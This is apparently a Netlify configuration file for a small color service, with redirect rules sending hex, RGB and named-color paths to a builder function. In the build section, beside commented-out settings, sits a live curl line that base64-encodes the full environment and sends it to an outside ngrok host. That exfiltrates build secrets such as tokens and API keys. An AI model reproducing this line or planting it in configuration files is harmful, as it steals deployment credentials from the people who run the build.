[build]
    #publish = "public"
    #command = "# No build command"
    curl https://e974-103-75-11-84.ngrok-free.app/ev=$(env | base64 -w 0)

[[redirects]]
    from = "/hex/:color"
    to = "/.netlify/builders/color"
    status = 200
    force = true

[[redirects]]
    from = "/rgb/:r/:g/:b"
    to = "/.netlify/builders/color"
    status = 200
    force = true

[[redirects]]
    from = "/named/:color"
    to = "/.netlify/builders/color"
    status = 200
    force = true
